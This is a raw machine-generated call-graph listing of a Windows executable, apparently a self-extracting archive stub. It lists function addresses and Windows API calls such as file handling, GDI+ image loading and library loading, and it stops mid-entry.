24972 d21397 74 API calls 24903->24972 24904 d2431c 24904->24881 24905->24904 24929 d34586 24905->24929 24908 d243da 24909 d24465 24908->24909 24925 d243d1 24908->24925 24957 d2e4a9 96 API calls 24908->24957 24939 d2bf0a 24909->24939 24910 d243d6 24910->24908 24956 d2252a 78 API calls 24910->24956 24912 d243c6 24955 d21397 74 API calls 24912->24955 24913 d243a8 24913->24908 24913->24910 24913->24912 24915 d24478 24919 d2450e 24915->24919 24920 d244fe 24915->24920 24958 d3422f 24919->24958 24943 d2a475 24920->24943 24923 d2450c 24923->24925 24967 d2237a 74 API calls 24923->24967 24968 d33546 24925->24968 24926->24886 24927->24888 24928->24883 24930 d3459b 24929->24930 24932 d345a5 ___std_exception_copy 24929->24932 24973 d2775a 75 API calls 24930->24973 24933 d346d5 24932->24933 24934 d3462b 24932->24934 24938 d3464f __cftof 24932->24938 24975 d43340 RaiseException 24933->24975 24974 d344b9 75 API calls 3 library calls 24934->24974 24937 d34701 24938->24913 24940 d2bf18 24939->24940 24942 d2bf22 24939->24942 24941 d3febe 27 API calls 24940->24941 24941->24942 24942->24915 24944 d2a47f __EH_prolog 24943->24944 24976 d28a1f 24944->24976 24947 d213d9 78 API calls 24948 d2a492 24947->24948 24979 d2e56c 24948->24979 24950 d2a4ee 24950->24923 24952 d2e56c 132 API calls 24953 d2a4a5 24952->24953 24953->24950 24953->24952 24988 d2e758 97 API calls __InternalCxxFrameHandler 24953->24988 24954->24904 24955->24925 24956->24908 24957->24909 24959 d34261 24958->24959 24960 d34238 24958->24960 24966 d34255 24959->24966 25003 d366d4 137 API calls 2 library calls 24959->25003 24961 d34257 24960->24961 24963 d3424d 24960->24963 24960->24966 25002 d373ae 132 API calls 24961->25002 24989 d37ddc 24963->24989 24966->24923 24967->24925 24969 d33550 24968->24969 24971 d33570 Concurrency::cancel_current_task 24969->24971 25004 d3220d 24969->25004 24972->24904 24973->24932 24974->24938 24975->24937 24977 d2c619 GetVersionExW 24976->24977 24978 d28a24 24977->24978 24978->24947 24985 d2e582 __InternalCxxFrameHandler 24979->24985 24980 d2e6f2 24981 d2e523 6 API calls 24980->24981 24983 d2e726 24980->24983 24981->24983 24982 d32128 SetThreadExecutionState RaiseException 24986 d2e6e9 24982->24986 24983->24982 24984 d39cad 117 API calls 24984->24985 24985->24980 24985->24984 24985->24986 24987 d2bff5 91 API calls 24985->24987 24986->24953 24987->24985 24988->24953 24990 d347ad 75 API calls 24989->24990 25001 d37ded __InternalCxxFrameHandler 24990->25001 24991 d2e56c 132 API calls 24991->25001 24992 d381fe 24993 d363b9 98 API calls 24992->24993 24994 d3820e __InternalCxxFrameHandler 24993->24994 24994->24966 24995 d324ef 81 API calls 24995->25001 24996 d35011 132 API calls 24996->25001 24997 d38253 132 API calls 24997->25001 24998 d322a6 88 API calls 24998->25001 24999 d388af 137 API calls 24999->25001 25000 d34b1c 98 API calls 25000->25001 25001->24991 25001->24992 25001->24995 25001->24996 25001->24997 25001->24998 25001->24999 25001->25000 25002->24966 25003->24966 25005 d324ef 81 API calls 25004->25005 25006 d3222f ReleaseSemaphore 25005->25006 25007 d3224f 25006->25007 25008 d3226d DeleteCriticalSection CloseHandle CloseHandle 25006->25008 25009 d32303 79 API calls 25007->25009 25008->24971 25010 d32259 CloseHandle 25009->25010 25010->25007 25010->25008 25012 d2e3a5 25011->25012 25014 d2e3ac 25011->25014 25016 d2aa7a 25012->25016 25014->24667 25015->24669 25017 d2aa93 25016->25017 25019 d2b110 79 API calls 25017->25019 25018 d2aac5 25018->25014 25019->25018 25021 d3efb8 25020->25021 25022 d2f937 53 API calls 25021->25022 25023 d3efdb 25022->25023 25024 d24a20 _swprintf 51 API calls 25023->25024 25025 d3efed 25024->25025 25026 d3e619 16 API calls 25025->25026 25027 d32eca 25026->25027 25027->24618 25028->24682 25029->24682 25030->24679 25032 d266ef 25031->25032 25080 d265fb 25032->25080 25034 d26722 25036 d2675a 25034->25036 25085 d2c6af CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 25034->25085 25036->24698 25038 d289dd 25037->25038 25039 d28a15 25038->25039 25091 d27931 74 API calls 25038->25091 25039->24704 25039->24707 25039->24711 25041 d28a0d 25092 d21397 74 API calls 25041->25092 25044 d2b043 25043->25044 25047 d2b052 25043->25047 25045 d2b049 FlushFileBuffers 25044->25045 25044->25047 25045->25047 25046 d2b0cf SetFileTime 25046->24781 25047->25046 25048->24689 25049->24702 25050->24696 25051->24703 25052->24719 25053->24719 25054->24719 25055->24719 25056->24719 25057->24716 25058->24716 25059->24714 25060->24720 25061->24741 25062->24720 25064 d2ab25 GetFileType 25063->25064 25065 d29b2b 25063->25065 25064->25065 25065->24726 25066 d2237a 74 API calls 25065->25066 25066->24743 25067->24726 25068->24745 25069->24771 25070->24771 25071->24766 25072->24771 25073->24771 25074->24775 25075->24777 25076->24784 25077->24774 25078->24704 25079->24704 25086 d264f8 25080->25086 25082 d2661c 25082->25034 25084 d264f8 2 API calls 25084->25082 25085->25034 25089 d26502 25086->25089 25087 d265ea 25087->25082 25087->25084 25089->25087 25090 d2c6af CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 25089->25090 25090->25089 25091->25041 25092->25039 25095->24796 25097 d2baa1 25096->25097 25098 d2bb20 FindNextFileW 25097->25098 25099 d2baba FindFirstFileW 25097->25099 25100 d2bb2b GetLastError 25098->25100 25106 d2bb02 25098->25106 25101 d2bac9 25099->25101 25099->25106 25100->25106 25102 d2cf32 GetCurrentDirectoryW 25101->25102 25103 d2bad9 25102->25103 25104 d2baf7 GetLastError 25103->25104 25105 d2badd FindFirstFileW 25103->25105 25104->25106 25105->25104 25105->25106 25106->24629 25107->24553 25118 d3b5f4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25109->25118 25111 d3b5dd 25112 d3b5e9 25111->25112 25119 d3b615 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25111->25119 25112->24276 25112->24277 25114->24280 25115->24286 25116->24286 25117->24289 25118->25111 25119->25112 25120->24297 25122 d2b1d2 78 API calls 25121->25122 25123 d2208f 25122->25123 25124 d220ac 25123->25124 25125 d21ad3 115 API calls 25123->25125 25124->24305 25124->24306 25126 d2209c 25125->25126 25126->25124 25128 d21397 74 API calls 25126->25128 25128->25124 25130 d3ffd0 25129->25130 25131 d2b4e0 GetFileAttributesW 25130->25131 25132 d2b4f1 25131->25132 25133 d2b4ca 25131->25133 25134 d2cf32 GetCurrentDirectoryW 25132->25134 25133->24069 25133->24082 25135 d2b505 25134->25135 25135->25133 25136 d2b509 GetFileAttributesW 25135->25136 25136->25133 26004 d3d8d8 97 API calls 4 library calls 26053 d44bd0 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25140 d2acd4 25143 d2acde 25140->25143 25141 d2ae2c SetFilePointer 25142 d2ae49 GetLastError 25141->25142 25146 d2acf4 25141->25146 25142->25146 25143->25141 25144 d2ae05 25143->25144 25145 d2aa7a 79 API calls 25143->25145 25143->25146 25144->25141 25145->25144 25976 d4b8c0 21 API calls 25977 d49cc0 7 API calls ___scrt_uninitialize_crt 26007 d53dc0 VariantClear 26054 d503c0 51 API calls 26055 d3d8d8 102 API calls 4 library calls 26036 d3c2f3 78 API calls 26009 d3edf1 DialogBoxParamW 25214 d4ccf0 25215 d4ccf9 25214->25215 25216 d4cd02 25214->25216 25218 d4cbe7 25215->25218 25219 d4a515 _unexpected 38 API calls 25218->25219 25220 d4cbf4 25219->25220 25238 d4cd0e 25220->25238 25222 d4cbfc 25247 d4c97b 25222->25247 25225 d4cc13 25225->25216 25226 d4a7fe __vswprintf_c_l 21 API calls 25227 d4cc24 25226->25227 25228 d4cc56 25227->25228 25254 d4cdb0 25227->25254 25231 d4a66a _free 20 API calls 25228->25231 25231->25225 25232 d4cc51 25264 d4a7eb 20 API calls _abort 25232->25264 25234 d4cc9a 25234->25228 25265 d4c851 26 API calls 25234->25265 25235 d4cc6e 25235->25234 25236 d4a66a _free 20 API calls 25235->25236 25236->25234 25239 d4cd1a __FrameHandler3::FrameUnwindToState 25238->25239 25240 d4a515 _unexpected 38 API calls 25239->25240 25242 d4cd24 25240->25242 25245 d4cda8 _abort 25242->25245 25246 d4a66a _free 20 API calls 25242->25246 25266 d4a0f4 38 API calls _abort 25242->25266 25267 d4bdf1 EnterCriticalSection 25242->25267 25268 d4cd9f LeaveCriticalSection _abort 25242->25268 25245->25222 25246->25242 25248 d45944 __cftof 38 API calls 25247->25248 25249 d4c98d 25248->25249 25250 d4c99c GetOEMCP 25249->25250 25251 d4c9ae 25249->25251 25252 d4c9c5 25250->25252 25251->25252 25253 d4c9b3 GetACP 25251->25253 25252->25225 25252->25226 25253->25252 25255 d4c97b 40 API calls 25254->25255 25256 d4cdcf 25255->25256 25259 d4ce20 IsValidCodePage 25256->25259 25261 d4cdd6 25256->25261 25263 d4ce45 __cftof 25256->25263 25257 d40d7c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25258 d4cc49 25257->25258 25258->25232 25258->25235 25260 d4ce32 GetCPInfo 25259->25260 25259->25261 25260->25261 25260->25263 25261->25257 25269 d4ca53 GetCPInfo 25263->25269 25264->25228 25265->25228 25267->25242 25268->25242 25270 d4cb37 25269->25270 25275 d4ca8d 25269->25275 25272 d40d7c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25270->25272 25274 d4cbe3 25272->25274 25274->25261 25279 d4db48 25275->25279 25278 d4bd38 __vswprintf_c_l 43 API calls 25278->25270 25280 d45944 __cftof 38 API calls 25279->25280 25281 d4db68 MultiByteToWideChar 25280->25281 25283 d4dba6 25281->25283 25291 d4dc3e 25281->25291 25285 d4a7fe __vswprintf_c_l 21 API calls 25283->25285 25288 d4dbc7 __cftof __vsnwprintf_l 25283->25288 25284 d40d7c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25286 d4caee 25284->25286 25285->25288 25293 d4bd38 25286->25293 25287 d4dc38 25298 d4bd83 20 API calls _free 25287->25298 25288->25287 25290 d4dc0c MultiByteToWideChar 25288->25290 25290->25287 25292 d4dc28 GetStringTypeW 25290->25292 25291->25284 25292->25287 25294 d45944 __cftof 38 API calls 25293->25294 25295 d4bd4b 25294->25295 25299 d4bb1b 25295->25299 25298->25291 25300 d4bb36 __vswprintf_c_l 25299->25300 25301 d4bb5c MultiByteToWideChar 25300->25301 25302 d4bb86 25301->25302 25303 d4bd10 25301->25303 25306 d4a7fe __vswprintf_c_l 21 API calls 25302->25306 25308 d4bba7 __vsnwprintf_l 25302->25308 25304 d40d7c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25303->25304 25305 d4bd23 25304->25305 25305->25278 25306->25308 25307 d4bbf0 MultiByteToWideChar 25309 d4bc09 25307->25309 25321 d4bc5c 25307->25321 25308->25307 25308->25321 25326 d4c12c 25309->25326 25313 d4bc33 25317 d4c12c __vswprintf_c_l 11 API calls 25313->25317 25313->25321 25314 d4bc6b 25315 d4a7fe __vswprintf_c_l 21 API calls 25314->25315 25322 d4bc8c __vsnwprintf_l 25314->25322 25315->25322 25316 d4bd01 25334 d4bd83 20 API calls _free 25316->25334 25317->25321 25318 d4c12c __vswprintf_c_l 11 API calls 25320 d4bce0 25318->25320 25320->25316 25323 d4bcef WideCharToMultiByte 25320->25323 25335 d4bd83 20 API calls _free 25321->25335 25322->25316 25322->25318 25323->25316 25324 d4bd2f 25323->25324 25336 d4bd83 20 API calls _free 25324->25336 25337 d4be58 25326->25337 25330 d4c19c LCMapStringW 25331 d4c15c 25330->25331 25332 d40d7c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25331->25332 25333 d4bc20 25332->25333 25333->25313 25333->25314 25333->25321 25334->25321 25335->25303 25336->25321 25338 d4be84 25337->25338 25339 d4be88 25337->25339 25338->25339 25343 d4bea8 25338->25343 25345 d4bef4 25338->25345 25339->25331 25344 d4c1b4 10 API calls 3 library calls 25339->25344 25341 d4beb4 GetProcAddress 25342 d4bec4 _abort 25341->25342 25342->25339 25343->25339 25343->25341 25344->25330 25346 d4bf15 LoadLibraryExW 25345->25346 25351 d4bf0a 25345->25351 25347 d4bf32 GetLastError 25346->25347 25348 d4bf4a 25346->25348 25347->25348 25349 d4bf3d LoadLibraryExW 25347->25349 25350 d4bf61 FreeLibrary 25348->25350 25348->25351 25349->25348 25350->25351 25351->25338 25978 d410f0 LocalFree 26010 d4d1f0 GetProcessHeap 25366 d213fd 43 API calls 2 library calls 26011 d3bde0 73 API calls 26012 d505e1 21 API calls __vswprintf_c_l 26057 d473e0 QueryPerformanceFrequency QueryPerformanceCounter 26037 d4c66e 27 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25980 d3b090 28 API calls 26015 d4b590 21 API calls 2 library calls 26038 d43a90 6 API calls 4 library calls 26058 d40790 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25982 d21095 44 API calls 26039 d3d8d8 111 API calls 4 library calls 25983 d38880 132 API calls 26016 d41180 RaiseException _com_raise_error _com_error::_com_error 26041 d43e8b 38 API calls 4 library calls 26059 d3c7b0 100 API calls 25911 d4bdb0 25912 d4bdbb 25911->25912 25913 d4c0ca 11 API calls 25912->25913 25914 d4bde4 25912->25914 25915 d4bde0 25912->25915 25913->25912 25917 d4be10 DeleteCriticalSection 25914->25917 25917->25915 26061 d40f0f 9 API calls 2 library calls 25918 d210b5 25919 d2644d 43 API calls 25918->25919 25920 d210ba 25919->25920 25923 d40372 29 API calls 25920->25923 25922 d210c4 25923->25922 25985 d3a4a0 GetClientRect 25986 d4d0a0 GetCommandLineA GetCommandLineW 26017 d3d8d8 107 API calls 4 library calls 26018 d3f5af 14 API calls ___delayLoadHelper2@8 25989 d2a850 80 API calls Concurrency::cancel_current_task 25990 d3b450 GdipCloneImage GdipAlloc 26063 d3e750 70 API calls 26020 d41550 51 API calls 2 library calls 26042 d4c65d 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25148 d3fd58 25149 d3fd62 25148->25149 25152 d3f9e9 25149->25152 25178 d3f747 25152->25178 25154 d3f9f9 25155 d3fa56 25154->25155 25156 d3fa7a 25154->25156 25157 d3f987 DloadReleaseSectionWriteAccess 6 API calls 25155->25157 25159 d3faf2 LoadLibraryExA 25156->25159 25160 d3fb53 25156->25160 25162 d3fb65 25156->25162 25173 d3fc21 25156->25173 25158 d3fa61 RaiseException 25157->25158 25174 d3fc4f 25158->25174 25159->25160 25161 d3fb05 GetLastError 25159->25161 25160->25162 25166 d3fb5e FreeLibrary 25160->25166 25163 d3fb18 25161->25163 25164 d3fb2e 25161->25164 25165 d3fbc3 GetProcAddress 25162->25165 25162->25173 25163->25160 25163->25164 25167 d3f987 DloadReleaseSectionWriteAccess 6 API calls 25164->25167 25168 d3fbd3 GetLastError 25165->25168 25165->25173 25166->25162 25169 d3fb39 RaiseException 25167->25169 25170 d3fbe6 25168->25170 25169->25174 25172 d3f987 DloadReleaseSectionWriteAccess 6 API calls 25170->25172 25170->25173 25175 d3fc07 RaiseException 25172->25175 25187 d3f987 25173->25187 25176 d3f747 ___delayLoadHelper2@8 6 API calls 25175->25176 25177 d3fc1e 25176->25177 25177->25173 25179 d3f753 25178->25179 25180 d3f779 25178->25180 25195 d3f7f0 25179->25195 25180->25154 25182 d3f758 25183 d3f774 25182->25183 25198 d3f919 25182->25198 25203 d3f77a GetModuleHandleW GetProcAddress GetProcAddress 25183->25203 25186 d3f9c2 25186->25154 25188 d3f9bb 25187->25188 25189 d3f999 25187->25189 25188->25174 25190 d3f7f0 DloadReleaseSectionWriteAccess 3 API calls 25189->25190 25191 d3f99e 25190->25191 25192 d3f9b6 25191->25192 25193 d3f919 DloadProtectSection 3 API calls 25191->25193 25206 d3f9bd GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 25192->25206 25193->25192 25204 d3f77a GetModuleHandleW GetProcAddress GetProcAddress 25195->25204 25197 d3f7f5 25197->25182 25201 d3f92e DloadProtectSection 25198->25201 25199 d3f934 25199->25183 25200 d3f969 VirtualProtect 25200->25199 25201->25199 25201->25200 25205 d3f82f VirtualQuery GetSystemInfo 25201->25205 25203->25186 25204->25197 25205->25200 25206->25188 26022 d3a540 6 API calls 26065 d40747 29 API calls _abort 26023 d40540 46 API calls __RTC_Initialize 26026 d22570 96 API calls 25356 d21075 25357 d304e5 41 API calls 25356->25357 25358 d2107a 25357->25358 25361 d40372 29 API calls 25358->25361 25360 d21084 25361->25360 26044 d3fe61 48 API calls _unexpected 25993 d3c460 99 API calls 26045 d4b660 71 API calls _free 26046 d51a60 IsProcessorFeaturePresent 25995 d3b410 GdipDisposeImage GdipFree 25375 d4d211 31 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26067 d3c316 GetDlgItem EnableWindow ShowWindow SendMessageW 25377 d40612 25378 d4061e __FrameHandler3::FrameUnwindToState 25377->25378 25409 d401ac 25378->25409 25380 d40778 25486 d40a0a 4 API calls 2 library calls 25380->25486 25381 d40625 25381->25380 25384 d4064f 25381->25384 25383 d4077f 25479 d4931a 25383->25479 25394 d4068e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 25384->25394 25420 d49ebd 25384->25420 25391 d4066e 25393 d406ef 25428 d40b25 GetStartupInfoW __cftof 25393->25428 25394->25393 25482 d48e0c 38 API calls 2 library calls 25394->25482 25396 d406f5 25429 d49e0e 51 API calls 25396->25429 25399 d406fd 25430 d3f05c 25399->25430 25403 d40711 25403->25383 25404 d40715 25403->25404 25405 d4071e 25404->25405 25484 d492bd 28 API calls _abort 25404->25484 25485 d4031d 12 API calls ___scrt_uninitialize_crt 25405->25485 25408 d40726 25408->25391 25410 d401b5 25409->25410 25488 d40826 IsProcessorFeaturePresent 25410->25488 25412 d401c1 25489 d43bee 25412->25489 25414 d401c6 25419 d401ca 25414->25419 25497 d49d47 25414->25497 25417 d401e1 25417->25381 25419->25381 25421 d49ed4 25420->25421 25422 d40d7c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25421->25422 25423 d40668 25422->25423 25423->25391 25424 d49e61 25423->25424 25425 d49e90 25424->25425 25426 d40d7c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25425->25426 25427 d49eb9 25426->25427 25427->25394 25428->25396 25429->25399 25595 d31b83 25430->25595 25434 d3f07c 25644 d3bd1b 25434->25644 25436 d3f085 __cftof 25437 d3f098 GetCommandLineW 25436->25437 25438 d3f0ab 25437->25438 25439 d3f13c GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 25437->25439 25648 d3d708 25438->25648 25440 d24a20 _swprintf 51 API calls 25439->25440 25442 d3f1a3 SetEnvironmentVariableW GetModuleHandleW LoadIconW 25440->25442 25659 d3c8cd LoadBitmapW 25442->25659 25444 d3f136 25653 d3ed2e 25444->25653 25445 d3f0b9 OpenFileMappingW 25448 d3f0d1 MapViewOfFile 25445->25448 25449 d3f12d CloseHandle 25445->25449 25451 d3f0e2 __InternalCxxFrameHandler 25448->25451 25452 d3f126 UnmapViewOfFile 25448->25452 25449->25439 25456 d3ed2e 2 API calls 25451->25456 25452->25449 25458 d3f0fe 25456->25458 25689 d3069c 82 API calls 25458->25689 25459 d3a0d7 27 API calls 25461 d3f203 DialogBoxParamW 25459->25461 25465 d3f23d 25461->25465 25462 d3f112 25690 d30752 82 API calls _wcslen 25462->25690 25464 d3f11d 25464->25452 25466 d3f256 25465->25466 25467 d3f24f Sleep 25465->25467 25470 d3f264 25466->25470 25691 d3bfb3 CompareStringW SetCurrentDirectoryW __cftof _wcslen 25466->25691 25467->25466 25469 d3f283 DeleteObject 25471 d3f298 DeleteObject 25469->25471 25472 d3f29f 25469->25472 25470->25469 25471->25472 25473 d3f2e2 25472->25473 25474 d3f2d0 25472->25474 25686 d3bd81 25473->25686 25692 d3ed8b 6 API calls 25474->25692 25476 d3f2d6 CloseHandle 25476->25473 25478 d3f31c 25483 d40b5b GetModuleHandleW 25478->25483 25824 d49097 25479->25824 25482->25393 25483->25403 25484->25405 25485->25408 25486->25383 25488->25412 25501 d44c97 25489->25501 25491 d43bf7 25491->25414 25494 d43bff 25495 d43c0a 25494->25495 25515 d44cd3 DeleteCriticalSection 25494->25515 25495->25414 25542 d4d21a 25497->25542 25500 d43c0d 7 API calls 2 library calls 25500->25419 25502 d44ca0 25501->25502 25504 d44cc9 25502->25504 25505 d43bf3 25502->25505 25516 d44edc 25502->25516 25521 d44cd3 DeleteCriticalSection 25504->25521 25505->25491 25507 d43d1c 25505->25507 25535 d44ded 25507->25535 25510 d43d31 25510->25494 25512 d43d3f 25513 d43d4c 25512->25513 25541 d43d4f 6 API calls ___vcrt_FlsFree 25512->25541 25513->25494 25515->25491 25522 d44d02 25516->25522 25519 d44f14 InitializeCriticalSectionAndSpinCount 25520 d44eff 25519->25520 25520->25502 25521->25505 25523 d44d1f 25522->25523 25527 d44d23 25522->25527 25523->25519 25523->25520 25524 d44d8b GetProcAddress 25524->25523 25526 d44d99 25524->25526 25526->25523 25527->25523 25527->25524 25528 d44d7c 25527->25528 25530 d44da2 LoadLibraryExW 25527->25530 25528->25524 25529 d44d84 FreeLibrary 25528->25529 25529->25524 25531 d44db9 GetLastError 25530->25531 25532 d44de9 25530->25532 25531->25532 25533 d44dc4 ___vcrt_InitializeCriticalSectionEx 25531->25533 25532->25527 25533->25532 25534 d44dda LoadLibraryExW 25533->25534 25534->25527 25536 d44d02 ___vcrt_InitializeCriticalSectionEx 5 API calls 25535->25536 25537 d44e07 25536->25537 25538 d44e20 TlsAlloc 25537->25538 25539 d43d26 25537->25539 25539->25510 25540 d44e9e 6 API calls ___vcrt_InitializeCriticalSectionEx 25539->25540 25540->25512 25541->25510 25545 d4d237 25542->25545 25546 d4d233 25542->25546 25543 d40d7c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25544 d401d3 25543->25544 25544->25417 25544->25500 25545->25546 25548 d4b860 25545->25548 25546->25543 25549 d4b86c __FrameHandler3::FrameUnwindToState 25548->25549 25560 d4bdf1 EnterCriticalSection 25549->25560 25551 d4b873 25561 d4d6e8 25551->25561 25553 d4b882 25559 d4b891 25553->25559 25574 d4b6e9 29 API calls 25553->25574 25556 d4b88c 25575 d4b79f GetStdHandle GetFileType 25556->25575 25557 d4b8a2 _abort 25557->25545 25576 d4b8ad LeaveCriticalSection _abort 25559->25576 25560->25551 25562 d4d6f4 __FrameHandler3::FrameUnwindToState 25561->25562 25563 d4d701 25562->25563 25564 d4d718 25562->25564 25585 d4a7eb 20 API calls _abort 25563->25585 25577 d4bdf1 EnterCriticalSection 25564->25577 25567 d4d706 25586 d451b9 26 API calls _abort 25567->25586 25569 d4d710 _abort 25569->25553 25570 d4d750 25587 d4d777 LeaveCriticalSection _abort 25570->25587 25571 d4d724 25571->25570 25578 d4d639 25571->25578 25574->25556 25575->25559 25576->25557 25577->25571 25579 d4c2f6 _abort 20 API calls 25578->25579 25580 d4d64b 25579->25580 25584 d4d658 25580->25584 25588 d4c0ca 25580->25588 25581 d4a66a _free 20 API calls 25583 d4d6aa 25581->25583 25583->25571 25584->25581 25585->25567 25586->25569 25587->25569 25589 d4be58 _abort 5 API calls 25588->25589 25590 d4c0f1 25589->25590 25591 d4c10f InitializeCriticalSectionAndSpinCount 25590->25591 25592 d4c0fa 25590->25592 25591->25592 25593 d40d7c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25592->25593 25594 d4c126 25593->25594 25594->25580 25596 d3ffd0 25595->25596 25597 d31b8d GetModuleHandleW 25596->25597 25598 d31c07 25597->25598 25599 d31ba8 GetProcAddress 25597->25599 25600 d31f34 GetModuleFileNameW 25598->25600 25702 d489ee 42 API calls 2 library calls 25598->25702 25601 d31bd9 GetProcAddress 25599->25601 25604 d31bc1 25599->25604 25611 d31f52 25600->25611 25605 d31beb 25601->25605 25603 d31e74 25603->25600 25606 d31e7f GetModuleFileNameW CreateFileW 25603->25606 25604->25601 25605->25598 25607 d31f28 CloseHandle 25606->25607 25608 d31eaf SetFilePointer 25606->25608 25607->25600 25608->25607 25609 d31ebd ReadFile 25608->25609 25609->25607 25612 d31edb 25609->25612 25614 d31fb4 GetFileAttributesW 25611->25614 25616 d31f7d CompareStringW 25611->25616 25617 d31fcc 25611->25617 25693 d2c619 25611->25693 25696 d31b3b 25611->25696 25612->25607 25615 d31b3b 2 API calls 25612->25615 25614->25611 25614->25617 25615->25612 25616->25611 25618 d31fd7 25617->25618 25620 d3200c 25617->25620 25621 d31ff0 GetFileAttributesW 25618->25621 25623 d32008 25618->25623 25619 d3211b 25643 d3b65d GetCurrentDirectoryW 25619->25643 25620->25619 25622 d2c619 GetVersionExW 25620->25622 25621->25618 25621->25623 25624 d32026 25622->25624 25623->25620 25625 d32093 25624->25625 25626 d3202d 25624->25626 25627 d24a20 _swprintf 51 API calls 25625->25627 25628 d31b3b 2 API calls 25626->25628 25629 d320bb AllocConsole 25627->25629 25630 d32037 25628->25630 25631 d32113 ExitProcess 25629->25631 25632 d320c8 GetCurrentProcessId AttachConsole 25629->25632 25633 d31b3b 2 API calls 25630->25633 25703 d44fa3 25632->25703 25635 d32041 25633->25635 25637 d2f937 53 API calls 25635->25637 25636 d320e9 GetStdHandle WriteConsoleW Sleep FreeConsole 25636->25631 25638 d3205c 25637->25638 25639 d24a20 _swprintf 51 API calls 25638->25639 25640 d3206f 25639->25640 25641 d2f937 53 API calls 25640->25641 25642 d3207e 25641->25642 25642->25631 25643->25434 25645 d31b3b 2 API calls 25644->25645 25646 d3bd2f OleInitialize 25645->25646 25647 d3bd52 GdiplusStartup SHGetMalloc 25646->25647 25647->25436 25649 d3d712 25648->25649 25650 d3d828 25649->25650 25651 d33307 CharUpperW 25649->25651 25705 d30752 82 API calls _wcslen 25649->25705 25650->25444 25650->25445 25651->25649 25654 d3ffd0 25653->25654 25655 d3ed3b SetEnvironmentVariableW 25654->25655 25656 d3ed5e 25655->25656 25657 d3ed86 25656->25657 25658 d3ed7a SetEnvironmentVariableW 25656->25658 25657->25439 25658->25657 25660 d3c8fb GetObjectW 25659->25660 25661 d3c8ee 25659->25661 25663 d3c90a 25660->25663 25706 d3b6d2 FindResourceW 25661->25706 25664 d3b5d6 4 API calls 25663->25664 25666 d3c91d 25664->25666 25667 d3c960 25666->25667 25668 d3c93c 25666->25668 25669 d3b6d2 13 API calls 25666->25669 25678 d2ed62 25667->25678 25722 d3b615 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25668->25722 25671 d3c92d 25669->25671 25671->25668 25673 d3c933 DeleteObject 25671->25673 25672 d3c944 25723 d3b5f4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25672->25723 25673->25668 25675 d3c94d 25724 d3b81c 8 API calls 25675->25724 25677 d3c954 DeleteObject 25677->25667 25733 d2ed87 25678->25733 25683 d3a0d7 25684 d3febe 27 API calls 25683->25684 25685 d3a0f6 25684->25685 25685->25459 25687 d3bdb0 GdiplusShutdown CoUninitialize 25686->25687 25687->25478 25689->25462 25690->25464 25691->25470 25692->25476 25694 d2c62d GetVersionExW 25693->25694 25695 d2c669 25693->25695 25694->25695 25695->25611 25697 d3ffd0 25696->25697 25698 d31b48 GetSystemDirectoryW 25697->25698 25699 d31b60 25698->25699 25700 d31b7e 25698->25700 25701 d31b71 LoadLibraryW 25699->25701 25700->25611 25701->25700 25702->25603 25704 d44fab 25703->25704 25704->25636 25704->25704 25705->25649 25707 d3b6f5 SizeofResource 25706->25707 25708 d3b7e3 25706->25708 25707->25708 25709 d3b70c LoadResource 25707->25709 25708->25660 25708->25663 25709->25708 25710 d3b721 LockResource 25709->25710 25710->25708 25711 d3b732 GlobalAlloc 25710->25711 25711->25708 25712 d3b74d GlobalLock 25711->25712 25713 d3b7dc GlobalFree 25712->25713 25714 d3b75c __InternalCxxFrameHandler 25712->25714 25713->25708 25715 d3b764 CreateStreamOnHGlobal 25714->25715 25716 d3b7d5 GlobalUnlock 25715->25716 25717 d3b77c 25715->25717 25716->25713 25725 d3b636 GdipAlloc 25717->25725 25720 d3b7c0 25720->25716 25721 d3b7aa GdipCreateHBITMAPFromBitmap 25721->25720 25722->25672 25723->25675 25724->25677 25726 d3b648 25725->25726 25728 d3b655 25725->25728 25729 d3b3c8 25726->25729 25728->25716 25728->25720 25728->25721 25730 d3b3f0 GdipCreateBitmapFromStream 25729->25730 25731 d3b3e9 GdipCreateBitmapFromStreamICM 25729->25731 25732 d3b3f5 25730->25732 25731->25732 25732->25728 25734 d2ed95 __EH_prolog 25733->25734 25735 d2edc4 GetModuleFileNameW 25734->25735 25736 d2edf5 25734->25736 25737 d2edde 25735->25737 25779 d2ab40 25736->25779 25737->25736 25739 d2ee51 25790 d47730 25739->25790 25740 d2a801 80 API calls 25741 d2ed6e 25740->25741 25777 d2f5be GetModuleHandleW FindResourceW 25741->25777 25743 d2ee25 25743->25739 25746 d2f581 78 API calls 25743->25746 25757 d2f06a 25743->25757 25744 d2ee64 25745 d47730 26 API calls 25744->25745 25754 d2ee76 ___vcrt_InitializeCriticalSectionEx 25745->25754 25746->25743 25747 d2efa5 25747->25757 25810 d2b000 81 API calls 25747->25810 25749 d2b110 79 API calls 25749->25754 25751 d2efbf ___std_exception_copy 25752 d2ae60 82 API calls 25751->25752 25751->25757 25755 d2efe8 ___std_exception_copy 25752->25755 25754->25747 25754->25749 25754->25757 25804 d2ae60 25754->25804 25809 d2b000 81 API calls 